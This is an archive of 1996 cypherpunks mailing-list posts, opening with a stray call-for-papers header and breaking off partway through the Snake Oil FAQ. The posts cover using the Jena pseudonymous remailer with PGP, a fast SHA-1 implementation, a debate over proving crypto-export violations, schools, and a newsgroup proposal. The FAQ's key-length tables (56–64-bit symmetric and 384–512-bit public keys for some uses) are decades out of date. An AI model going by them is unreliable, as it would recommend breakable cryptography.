	     Acceptance	Notification:	August 1, 1997
	     Final Manuscript Due:	November 1, 1997
	     Publication Date:		2nd Quarter 1998

Ross Anderson				Ingemar	Cox
Cambridge University Computer Lab	NEC Research
Pembroke Street				4 Independence Way
Cambridge CB2 3QG, U.K.			Princeton NJ 08540, USA
Tel: +44 1223 33 47 33			Tel:  +1 609 951 2722
Fax: +44 1223 33 46 78			Fax:  +1 609 951 2482
Email: ross.anderson@cl.cam.ac.uk	Email: ingemar@research.nj.nec.com

Steven Low				Nicholas Maxemchuk
Dept. of Electrical  Electronic	Engr.	ATT Laborataries
University of Melbourne			600 Mountain Ave.
Parkville, Vic 3052, Australia		Murray Hill NJ 07974, USA
Tel: +6	13 9287	9205			Tel:  +1 908 582 6240
Fax: +6	13 9287	9188			Fax:  +1 908 582 5807
Email: slow@ee.mu.oz.au			Email:	nfm@research.att.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Ono <wmono@Direct.CA>
Date: Sat, 28 Sep 1996 10:38:04 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Jena Remailer
In-Reply-To: <199609271630.JAA24185@sirius.infonex.com>
Message-ID: <Pine.LNX.3.94.960927165916.482X-100000@crash.direct.ca>
MIME-Version: 1.0
Content-Type: text/plain


My appologies in advance to the list for this noise.  Dear Anonymous, if
there is another way to contact you, please let it be known so that this
need not involve the 1500 others on the list.

On Fri, 27 Sep 1996, Mixmaster wrote:

> OK, it's an improvement, but there's still some obscurity and a couple
> of other problems:

>  w>     * The hexadecimal key-ID forms the Email address.  For example,
>         if the nym's key is 0x01020304, the address will be:
>         anon-01020304@as-node.jena.thur.de
> 
> Already a confusion:  Is not the address pseudonym@as-node.jena.thur.de?

No, it's not.  "the address will be: anon-01020304@as-node.jena.thur.de"
implies that the address will be anon-01020304@as-node.jena.thur.de

> And, since the key ID is an eight-digit hex number, why the confusing
> 
>         "...if the nym's key is 0x01020304, the address will be:"
>                                 ^^
> ...or am I missing something already?

0x is used to indicate that the characters that follow are in hexadecimal.

>  w>     * The user-ID of the key contains the pseudonym, only.  Note:
>         This is different from the convention, which is to include the
>         Email address in angle brackets.
> 
> OK, so if I understand this properly, when prompted for an account name
> in PGP one simply enters
> 
>         pseudonym
> 
> ...with no quotes or address ("pseudonym" <pseudonym@someplace.net>).

Exactly.  Just the pseudonym.  Remember that at this point, you do not
know what your pseudonymous address will be, because the keys have not
been generated.

>  w>  * Subject: (or Anon-Subject:)
[deletia]
> The header fields in parens are identical in function or not?

Yes, identical in function.

To: bill@macrosquash.com

is the same as

Anon-To: bill@macrosquash.com

>  w>  - Run 'pgp -esa -u "pseudonym" anon@as-node anonid.asc' to sign and
>  w>     encrypt the extracted key for the server.
> 
> These various command lines in the helpfile do not work in the pre-legal
> PGP 2.6/uix/ui versions preferred by many, though equivalent command
> lines of course exist.

I use PGP 2.6.2 as distributed by MIT.  The command line in my re-written
help file works for my copy of PGP.  The command line in the original help
file appearantly works for the international edition, although I am not
able to confirm this.

> The procedure didn't produce results for me so far, but before trying
> again I wish to get confirmation that I am trying properly:

>         1:  Generate key with simple, one-word pseudonym, no quotes, no
>             address, no nothing.

Multiple words work fine, but yes, that should be fine.

>         2:  Generate -kxa keyfile, pseudo.asc
> 
>         3:  -esa encrypt keyfile with Jenaer Remailer's PGP key and send
>             to anon@as-node.jena.thur.de via a remailer.

Yes, that is correct -- be sure that you are signing with your nym's key,
and not your own.  Also be sure that the remailers you are using are
functional.

>         4:  Account is automatically established and should work
>             immediately.

As soon as the mail arrives, that is correct.  If it was lost by using a
non-operational remailer, or by sending a misformatted mail, then it will
not.

> To test...
> 
>         1:  Prepare message textfile according to sample:
> 
>                 Newsgroups: de.test
>                 Subject: Test
> 
>                 This is the test message textbody...

Correct.  All of this should be starting at column 0, with no indentation.

>         2:  PGP encrypt the filebody and two header lines with the Jenaer
>             Remailer's key using the -esa command, signing the cyphertext
>             with your key previously sent to the remailer.
> 
>         3:  Send the resulting cyphertext message to the Jenaer Remailer
>             via another remailer, making sure to avoid command words in
>             the Subject: field of the outgoing message.
> 
> As I say, following these protocols I have not yet seen a resulting
> message in the test group I have chosen.  Do you feel this is due to
> lag, or am I doing something obviously wrong?

It may be lag, it may not be.  I recommend that you create a test nym,
with minimal anonymity (no remailers, send everything directly to jena)
and, after waiting several hours to ensure that the key was added, send a
mail from your nym to your own account.  If you get no mail after several
hours, something is wrong.

>  w> - Never request a delivery to your real Email address.
> 
> So here's what I really want to know:  When/if the new account is up and
> running, how _does_ one discreetly retrieve his mail?  I don't see how,
> other than to have it sent to alt.anonymous.messages via a mail2news
> netmail address such as alt.anonymous.messages@news.demon.co.uk and then
> pick through the mess there until some cyphertext message responds to
> his right key.

That's exactly right.  We need better message pools.  Actually, what is
needed is a email message pool, because of the lag and uncertainly of
Usenet.  But that's a project for another day.

hth.


--
William Ono <wmono@direct.ca>                                PGP Key: F3F716BD
 fingerprint = A8 0D B9 0F 40 A7 D6 64  B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome!           "640k ought to be enough for everybody."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 28 Sep 1996 10:43:47 +0800
To: cypherpunks@toad.com
Subject: Re: Public domain SHA-1 in C
Message-ID: <Pine.BSF.3.91.960927172700.1183A-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to Eric Young's suggestions, my SHA-1 is now _very_ fast. If you
downloaded the older version (before 5:30pm Pacific time) you'll probably
want to download the new-and-improved version. 

http://www.edmweb.com/steve/sha1.c


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP (2048/9F317269) Fingerprint: 11C89D1CD67287E68C09EC52443F8830 |
|          -- Disclaimer: JMHO, YMMV, TANSTAAFL, IANAL. --          |
===================================================================:)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 28 Sep 1996 09:47:20 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007802ae70be85e0c3@[207.167.93.63]>
Message-ID: <Pine.SUN.3.94.960927173910.24094C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Sep 1996, Timothy C. May wrote:

> At 1:37 PM -0400 9/26/96, Black Unicorn wrote:
> 
> >>
> >> b. evidence that the "confession" can be backed up by other evidence
> >>
> >
> >In the case of the export at hand, a passport record exists, and surely
> >the notebook exists.  Were I a prosecutor with a bug in my rectum, I would
> >think I had something of a case.
> 
> What evidence of any sort do they have that any particular notebook
> computer was involved in the trip offshore? Seems to me this is a rather
> major defect in the evidence chain.

His admission that he used the notebook.  Recovering the notebook and
finding the software.  Interviewing the Customs agent working at the time.

Considering the headaches required for airline travel today, it's not like
there aren't serious records abound.

For crying outloud, he admitted to the world that he took the software
out.  I put that in front of a jury and it looks just like the typical
stupid bragging criminal.  Any defense about "I was just kidding" or "The
message was forged" might be interesting, but it will sound like
technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a
reasonable doubt, but a jury is very unlikely to buy it.  Juries almost
never buy things they don't understand.  Technical talk makes them sleepy.
"Can't we go back to the hotel now?  Dey gots good eatings."

> 
> --Tim May
> 
> 
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 28 Sep 1996 09:28:22 +0800
To: attila <attila@primenet.com>
Subject: Re: Is "Black Unicorn" a lawyer, or just a nym used by a lawyer?
In-Reply-To: <199609270540.XAA21446@InfoWest.COM>
Message-ID: <Pine.SUN.3.94.960927175024.24094F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I do not currently have an active practice in the United States.  Should a
project come along within those boarders which interests me, that might
change.  I do not foresee that happening however.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 28 Sep 1996 09:58:42 +0800
To: ronsimpson <ronsimpson@unidial.com>
Subject: Re: Public Schools
In-Reply-To: <324BD4FD.3372@unidial.com>
Message-ID: <Pine.SUN.3.94.960927175632.24094G-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, ronsimpson wrote:

> I hate to burst any bubbles but, the school with the highest number of
> National Merit Finalists and highest number of 1600 SATs is a Public
> High School (Jefferson High in Fairfax, VA)

As a former Fairfax resident I can tell you that the reason the school
preforms so well is because of the immense income from local property
taxes, and because the Fairfax school system has taken great pains to
maintain autonomy and freedom from the public school system at large.
They have managed, quite effectively, to create a private school that
receives public funds and keeps out interlopers.  They have my admiration
for this task.

I can also point out that everyone in the Greater D.C. area is trying to
get their kids into the various Fairfax schools.  Some resort to lying to
the DMV about their address to do so.  It is a measure of the clout of the
Fairfax school system that a few complaints have triggered a crackdown on
district monitoring which (surprise surprise) is concentrated in Fairfax.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 28 Sep 1996 11:17:56 +0800
To: Adam Shostack <adam@homeport.org>
Subject: RE: LivePGP (fwd)
In-Reply-To: <199609271533.KAA08175@homeport.org>
Message-ID: <Pine.SUN.3.94.960927180106.24094H-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, Adam Shostack wrote:

> ----- Edited message from Ming-Ching Tiew -----
> 
> >From mctiew@csi.po.my  Thu Sep 26 22:36:39 1996
> Message-ID: <01BBAC57.C7351E60@minuet>
> From: Ming-Ching Tiew <mctiew@csi.po.my>
> To: "'Adam Shostack'" <adam@homeport.org>
> Subject: RE: LivePGP
> Date: Fri, 27 Sep 1996 09:39:21 +-800
> Encoding: 38 TEXT
> 
> 
> 
> Do you already have this information ?
> 
>    http://www.vv.com.au/vv/resources/security/livepgp/README.html
> 
> The copy is expiring soon. I will soon be releasing a new copy which is 
> much for polished. 
> 
> I am not releasing the source.

Then I am not using the software.

> 
> 
> ----- End of forwarded message from Ming-Ching Tiew -----
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sat, 28 Sep 1996 11:22:31 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <v03007800ae71bb8f8b1f@[207.167.93.63]>
Message-ID: <324C7C95.3A79@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> At 9:22 AM -0400 9/27/96, ronsimpson wrote:
> >I hate to burst any bubbles but, the school with the highest number
> >of National Merit Finalists and highest number of 1600 SATs is a
> >Public High School (Jefferson High in Fairfax, VA)

> I took some of my science classes at Jefferson.
> Yes, shocking as it may seem, I AM A PRODUCT OF PUBLIC SCHOOLS.
> Help me before it's too late.
> (Seriously, my view is that schools are not very important. All
> success, academic or technical, derives from one basic determining
> factor: those who read for pleasure, succeed, and those who don't read 
> for pleasure, don't. The young child who reads will usually keep
> reading, whether novels, encyclopedias, lists like this, etc. The
> child who is not into reading will likely never get into it later in 
> life. Which is OK, as there is a serious
> shortage of tradesmen, at least in my area, and more kids ought to be
> taught usable trades. Seriously. Our "ideal" that all children should
> attend college is absurd, given the lack of academic preparation,
> desire, and reading skills that so many high school students lack. 
> Most community
> colleges are essentially becoming Grades 13-14, with most of the Grade
> 13-14 students reading at the 9th-grade level (which most of us on
> this list were reading at when we were in the 7th-grade, or earlier).)

On the "ideal that all children should attend college":

I grew up in Ohio and went to school in the 1950's.  College was a 
luxury, or necessary only for professional jobs (doctor, etc).
There was no Ohio income tax, and no state lottery, both of which were 
instituted (in the 1970's) at least partly on the premise of helping 
schools.

I don't have to elaborate on where the money went, right?  But, if you 
are suggesting seriously that one of the greatest money scams of all 
time, which involves not only moving pay-for-school to the masses (i.e., 
requiring college for nearly everyone), but makes indentured servants 
out of most of the people who get a serious degree, well, you're up 
against the big bucks on that one.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sat, 28 Sep 1996 11:39:20 +0800
To: cypherpunks@toad.com
Subject: Re: "Confessing to a felony"
In-Reply-To: <v03007802ae70be85e0c3@[207.167.93.63]>
Message-ID: <v03007801ae7237ed7a65@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:43 PM -0400 9/27/96, Black Unicorn wrote:
>On Thu, 26 Sep 1996, Timothy C. May wrote:

>His admission that he used the notebook.  Recovering the notebook and
>finding the software.  Interviewing the Customs agent working at the time.

His admission that he used _which_ notebook? Chain of evidence again.

Finding _which_ software?

(As for the Customs agent, I can assure you that my luggage has never been
checked upon either leaving the U.S. or entering the U.S. Even if U.S.
Customs could figure out who was working at the time I putatively entered
the country, and even if he remembered _me_, months later, just what
records would he have, and how would they stand up in court?)

Hearing me say I "exported crypto," a hearsay claim, and happening to find
one or more laptops at my home, weeks or months later, implies nothing. (To
make the point graphically, suppose the raiding party finds _several_
laptops or notebooks...do they assume _all_ were taken out of the country,
or do they pick the one with the most incriminating software on it? Answer:
Unless they can _prove_ one of them was used, and that it had not been
_changed_ since the putative event (highly unlikely), they cannot simply
_assume_ one of them was taken out.

(Seems to me to be an open and shut case. "Oh, _that_ laptop? That's not
the one I took to Europe."   "Oh, you say this laptop has PGP 5.9 on it?
So? I installed it last week. My trip to Europe was last summer.")


>Considering the headaches required for airline travel today, it's not like
>there aren't serious records abound.

Such as? I recall no inspections of my luggage, no inventorying of the
serial numbers of my laptops, no inspection whatsoever of my
magneto-optical drives (which were in my carry-on luggage, and not even
glanced at, in the box they were in). X-rays would not prove what was taken
in or out of the country, even if "x-ray escrow" were implemented (which it
is not, according to all reports I have heard, and based on some practical
limits on storage), I doubt the records of a trip, say, last summer (of
'95) could be retrieved and prove that a particular laptop was taken out.
Not to mention that the software allegedly taken out might have been on any
kind of media, none of them distinguishable with an x-ray machine.

>For crying outloud, he admitted to the world that he took the software
>out.  I put that in front of a jury and it looks just like the typical

"For crying out loud" is bluster, not legal argument.

>stupid bragging criminal.  Any defense about "I was just kidding" or "The
>message was forged" might be interesting, but it will sound like
>technical-mumbo-jumbo to a jury.  Yes, it would convince >ME< that was a

Legal proof is still needed. Given only a nebulous statement like "I
exported crypto in violation of the ITARs," or "I shipped PGP to Europe,"
is not enough for a case even to be brought to trial.

(If it reached trial, I would expect a defense attorney to move for
dismissal. Absent any evidence that a crime occurred, absent any proof
beyond the nebulous hearsay statement of a "braggart," there is simply no
basis for criminal action.)

"Stupid bragging criminals" may be common, but bragging is not in and of
itself illegal. There still has to be evidence of a crime.

"Produce the body."

(I can say I personally whacked Jimmy Hoffa. Absent other evidence, or the
body, or witnesses, does this mean I'll be found guilty? To use BU's
phrasing, "for crying out loud.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sat, 28 Sep 1996 09:43:43 +0800
To: cypherpunks@toad.com
Subject: Re: In defense, sort of, of Phill Hallam-Baker
In-Reply-To: <52h5cl$5v4@life.ai.mit.edu>
Message-ID: <324C56AE.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:

> However, I also think that Phill has this passion for order that sometimes
> borders on the pathological. Maybe because, like Bertrand Russell (who
> Phill and I both admire) says, romanticism, leftism and communism are
> basically feudalism in disguise, and Phill's a closet aristocrat. ;-).
> Maybe not.

Of course socialism is grounded in paternalism. Robert Owen, its founder
was in his day the equivalent of Steve Jobs, an extreemly rich and
successful
merchant who considered that wealth also implied responsibility.

> I think what we see as his blustering trolls on this list come from
> passion. But, I don't think they're trolls at all. I think they show, more
> often than not, his outrage at the way the world's going to go. Which,
> obviously, is *our* way, and not his. He knows very well the power of the
> technology we talk about here, and deep down, I think he knows we're right.

If people want to have a sensible disscussion about technology and
policy
then I think that keeping the discussion grounded in reality is a good
thing.

I don't think that the political situation is going in a libertarian 
direction, quite the opposite. I see technology as having greatly
increased
the power of government and that it will be necessary to institute
checks
and balances to make it work. 

I also think that you are being very naive with regards to the threat
posed
by corporations to individual liberties. I see no reason to distinguish 
between corporate intrusions and state intrusions except in one respect.
If we can't find a way to make society work without some form of
intrusion
the agency that is responsible has to be under democratic control.

I think that unless the case for privacy is put in a way which society
at large accepts then Freeh and the corporations will win. HMOs will be
touting peoples medical records on the open market (many already do),
employers will vet empoloyees on the basis of reports drawing on
information
on video rentals and so on.

I certainly don't agree with Denning or Sternlight. Sternlight is either
a
fool or an invention of the NSA. Denning bases her argument against
crypto
on hidden sources. I know my experience in the area concerned to be 
significantly greater than hers since if she had operational experience
she
would say so. 


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 28 Sep 1996 09:29:51 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <199609270522.WAA14373@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.95.960927182737.883A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 26 Sep 1996, John Anonymous MacDonald wrote:

> This sounds like a good idea.  I would certainly vote for such a news
> group.  Should the name be misc.anonymous or misc.anonymous.messages?
> Are alt.anonymous and alt.anonymous.messages basically to different
> newsgroups for exactly the same purpose, or is there some difference
> between them.

This is what's listed in the newsgroups file:

alt.anonymous		alt!  Who goes there?
alt.anonymous.messages	An anonymous message pool newgroup, whatever that is.

Alt.anonymous is just another content-free, basically dead newsgroup.  Alt.
anonymous.messages is the group used for message pools.  Since the general
rule for naming newsgroups is to use dots only for designating a lower group
hierarchy.  misc.anonymous-messages is probably a better name, since there is
no misc.anonymous.* newsgroup hierarchy.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkxX8yzIPc7jvyFpAQEwRggApePkCcuHKMy3l3dHaMfBBr44WkZwSKJo
VcRnC16rKu8cof/vS1rAZPv6/504Z9u4Q8M+S5nxK8V6vVFPzA+TF/I/TQs8FekU
eTAAmD2FXarZRYUKw4iraxRba5CkHuKNs8h7G+d9XrfZ71kFMlcP9Kmi968bxx+I
IuyVX6PEmaapbC88GZukfDCfTwuW0aZvhqseB/dzSeDnDXgfMYdNXHXBXJr+maiH
Nf6tXNFYlsf1D3D/JF6u31n4JDGi9fHrz+9nNH6xpKy8EAehJzQd2aQME2fKDYHJ
zu+tfyLc8I/irYpTOUtZ0nRYxUxBZoJ8moucD9569erZY0OEMqc4/Q==
=lblb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 28 Sep 1996 09:42:55 +0800
To: cypherpunks@toad.com
Subject: Re: Newsgroup proposal: misc.anonymous
In-Reply-To: <v03007806ae7183b9596e@[206.119.69.46]>
Message-ID: <Pine.LNX.3.95.960927185114.883B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 27 Sep 1996, Robert Hettinga wrote:

> It seems that if newsgroup RFC and the whole rigamarole of newsgroup voting
> was set up, there would be enough people -- on this list alone, probably --
> who would be interested enough in the idea to at least vote (publically)
> for it. I certainly would, just to see what happens.
> 
> Of course, that means that someone *else* ;-) has to actually put the train
> on the track, much less lay the rails, which, as usual, is the main problem
> here. If we had some ham, we could have some ham and eggs, if we had some
> eggs. If you  lived here, you'd be home now. And so forth.
> 
> Same as it ever was.

You're forgetting that "Cypherpunks write RFD's".  I'll write up a formal
Request For Discussion in my copious spare time.  I have no experience in the
newsgroup creation process, but it is well documented in the
news.announce.newgroups FAQ's.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMkxbnizIPc7jvyFpAQGbhgf+PwVQJL6pfULIo83ckKwCyqd3uQXJRSyU
A9zKSE21KYxZl91N5PfGBBoeBc6Slnit6KdduPEUHI8d1YrDG6XWs8CDiXHJxSDW
BQolYGAqiRLJA3ickQTuM33CUmW7GRHzXSHXKF9Skx9oKanO08LjgHcd0H9AZ7sY
zHBubzw8ud9OjQUSnTbkTRDGVtUIA6sE+TZhDz5Sb3FbjtBw/9I/yBi5vC87o97F
HUJp8HvxtsrxUrlPXzOb5/w2ECBQiwNtYbdwwEmJYbbKPAeTf68KOKw/VbpKcE7X
G7qXzDbO0En7JZ4dO2TKCGoFtrgzMpf9PyfHQ+Es1diRSq645qCb7g==
=RrXA
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@research.megasoft.com>
Date: Sat, 28 Sep 1996 12:06:23 +0800
To: cypherpunks@toad.com
Subject: Snake Oil FAQ 1.0
Message-ID: <199609272313.TAA00656@goffette.research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Obviously, there's still work to be done, but that's why there are
numbers higher than 1.0, right? :-)

-matt

URL: http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html
Version: 1.0
Archive-name: cryptography-faq/snake-oil
Posting-Frequency: monthly

                           Snake-Oil Warning Signs
                        Encryption Software to Avoid
                        Copyright (c) 1996 Matt Curtin
      $Id: snake-oil-faq.html,v 1.0 1996/09/27 21:15:04 cmcurtin Exp $

Distribution

Distribution of this document is unlimited. We're specifically interested in
reaching people making decisions about what sorts of crypto to use (if any
at all), both for their organizations and for themselves, especially those
who are non-experts in the field of cryptography and security. This is a
work-in-progress. Feedback is greatly appreciated.

The Snake Oil FAQ is posted monthly to cypherpunks, sci.crypt, alt.security,
comp.security, comp.answers, and comp.infosystems.

Disclaimer

All contributors' employers will no doubt disown any statements herein.
We're not speaking for anyone but ourselves. This is a compilation things
that are common among snake oil vendors. It cannot be the sole metric by
which a security product is rated, since there can be exceptions to most (or
all?) of these rules. (But if you're looking at something that sounds
familiar on several of the 'things to watch out for,' you're probably
dealing with snake oil. From time to time, a reputable and decent vendor
will produce something that is actually quite good, but will use some
braindead marketing technique, so be aware that exceptions to general rules
can exist.)

Every effort has been made to produce an accurate and useful document, but
the information contained herein is completely without warranty. If you find
any errors, or wish to otherwise contribute, please contact the document
keeper, Matt Curtin <cmcurtin@research.megasoft.com>

History

With the rise in the number of crypto products becoming available came a
rise in the amount of ineffective or outright bogus products. After some
discussion about this on the cypherpunks list, Robert Rothenburg
<wlkngowl@unix.asb.com> wrote the first iteration of the Snake Oil FAQ. Matt
Curtin took the early text and munged it into its current state with the
help of the listed contributors (and probably some others whose names have
inadvertently missed. Sorry in advance, if this is the case.)

Introduction

This really isn't much of a "FAQ" in the sense that one generally expects to
see them: in a question and answer format. Perhaps it will be rewritten as
such in the future, but currently, it is more traditionally-formatted paper
that covers many topics that are the subject of frequently asked questions.

Good cryptography is an excellent and necessary tool for almost anyone.
However, there is a multitude of products around. Many good cryptographic
products are available, both commercial (including shareware) and free.
However, there are also some extremely bad cryptographic products (known in
the field as "Snake Oil"), which not only fail do their job of providing
security, but are based on, and add to, the many misconceptions and
misunderstandings surrounding cryptography and security.

Why "snake oil?" The term is used in many fields to denote something that is
sold without consideration of its quality, or its ability to live up to
claims made by its vendor. This term originally applied to that sold in
traveling medicine shows, where the salesmen would claim their elixer would
cure just about any ailment that a potential customer could have. Listening
to some of the claims made some by modern day crypto vendors, "snake oil" is
a surprisingly apt name.

Superficially, it is difficult for someone to distinguish the output of a
secure encryption utility from snake oil: both look garbled. The purpose of
this document is to present some obvious "red flags" that people unfamiliar
with the nuts and bolts of cryptography can use as a guideline for
determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not
mention specific products or algorithms as being "good" or "Snake Oil".

When evaluating any product, be sure to understand what your needs are. For
data security products, what do you need protected? Do you want an archiver
that supports strong encryption? An E-mail client? Something that will
encrypt on-line communications? Do you want to encrypt an entire disk or
partition, or selectively some files? How secure is "secure enough?" Does
the data need to be unreadable by third parties for 5 minutes? One year? 50
years? 100 years? Is the third party someone's kid sister? An individual? A
corporation? A government?

Beware of products that are designed for a specific task (such as data
archiving, for example), and add encryption in as an additional feature.
Typically, it's better to use an encryption utility for encryption, rather
than some tool designed for another purpose that adds encryption to its list
of features.

Some basics

The cryptography-faq (found at
http://www.cis.ohio-state.edu/hypertext/faq/usenet/cryptography-faq/top.html)
is a more general tutorial of cryptography, and should also be consulted. In
an effort to make this FAQ more complete, some very basic topics are
included below.

Conventional vs. Public Key Cryptography

There are two basic types of cryptosystems: symmetric (also known as
"conventional," sometimes also called "secret key") and asymmetric ("public
key.") Symmetric ciphers require both the sender and the recipient to have
the same key. That key is applied to encrypt the data by the sender, and
again by the recipient to decrypt the data. The problem here is getting the
sender and recipient to share the key. Asymmetric ciphers are much more
flexible, from a key management perspective. Each user has a pair of keys: a
public key and a private key. The public key is shared widely, given to
everyone, while the private key is kept secret. If Alice wishes to mail Bob
some secrets, she simply gets (and verifies!) Bob's public key, encrypts her
message with it, and sends it off to Bob. When Bob gets the message, he uses
his private key to decrypt the message.

Secrecy vs Integrity: What are you trying to protect?

For many users of computer based crypto, preserving the contents of a
message is as important as as protecting its secrecy. Damage caused by a
modified message can often be worse than that caused by its disclosure. For
example, it may be disquieting to discover that a hacker has read the
contents of your funds transfer authorization, but it's a disaster for him
to change the transfer destination to his own account.

Encryption by itself does not protect a message from change. In fact, there
are several techniques for changing the contents of an encrypted message
without ever figuring out the encryption key. If the integrity of your
messages is important, don't just rely on secrecy to protect them. Check the
vendor's claims for an explanation of how their product protects the message
from undetected modification.

The verification of public keys is an important step. Failure to verify
Bob's public key leaves open the possibility that Alice is sending her
secrets to someone else, who simply claims to be Bob, using a key that has
Bob's name on it, but whose associated private key is in the hands of an
attacker.

Asymmetric ciphers are much slower than their symmetric counterparts. Also,
key sizes must be much larger. See the cryptography FAQ for a more detailed
discussion of these topics.

Key Sizes

Some ciphers, while currently secure against most attacks, are not
considered viable in the next few years because of relatively small key
sizes and increasing processor speeds (making a brute-force attacks - trying
every possible key - feasible). The tables below should give some general
guidelines for making intelligent decisions about the key length you need.
If the key is too short, the system will be easily broken, even if the
cipher is a good one.

Having stated the above, it is important to note that a common feature of
snake oil is to have large keys. Often, the claimed key lengths are much
longer than what is practical, usually due to the vendor's confusion between
symmetric and asymmetric cipher key length requirements. (For example, a
vendor who claims to use a strong symmetric cipher with a 2048 bit key is
probably lacking some basic understanding of key length requirements, and
requisite computing power for performing various functions with the keys in
question.)

In [1] and [2], we're presented with some guidelines for deciding
appropriate key length. (It is important to note that this is based on the
ability to predict computing power 40, 65, and 100 years from now. Major
breakthroughs in computing power 30 years from now might render everything
on this chart kiddieplay. This is included so the reader will be able to get
a reasonable idea of symmetric key length requirements, and have some sort
of a guideline for determining whether the key length of the product he's
interested in even makes sense.) The following chart appears in [1].

               Security Requirements for Different Information

              Type of Traffic                Lifetime   Minimum [Symmetric]
                                                             Key Length
 Tactical military information             minutes/hours     56-64 bits
 Product announcements, mergers, interest
 rates                                      days/weeks        64 bits
 Long-term business plans                      years          64 bits
 Trade secrets (e.g., recipe for
 Coca-Cola)                                   decades         112 bits
 H-bomb secrets                              >40 years        128 bits
 Identities of spies                         >50 years        128 bits
 Personal affairs                            >50 years        128 bits
 Diplomatic embarrassments                   >65 years   at least 128 bits
 U.S. Census data                            100 years   at least 128 bits

As mentioned earlier, asymmetric ciphers require significantly longer keys
to provide the same level of security as their symmetric cipher
counterparts. Here is a comparison table, again, from [1]. (Due to
differences between symmetric and asymmetric algorithms, key length
comparisons between the two is difficult. The following is intended to give
the reader just a general idea of what is roughly comparable, in order to be
able to weed out claims of security of, for example, ciphers with 100-bit
asymmetric keys.)
                    Symmetric and Public-Key Lengths With
                 Similar Resistance to Brute-Force Attacks*

                 Symmetric Key Length Public-key Key Length
                        56 bits             384 bits
                        64 bits             512 bits
                        80 bits             768 bits
                       112 bits             1792 bits
                       128 bits             2304 bits
*These key sizes are for public key cryptosystems based on the problem of
factoring large integers, and apply to a number of ciphers based on the
discrete log problem (difficulty of taking logarithms in a finite field.) A
variation of the discrete log problem (known as Elliptic Curve Discrete
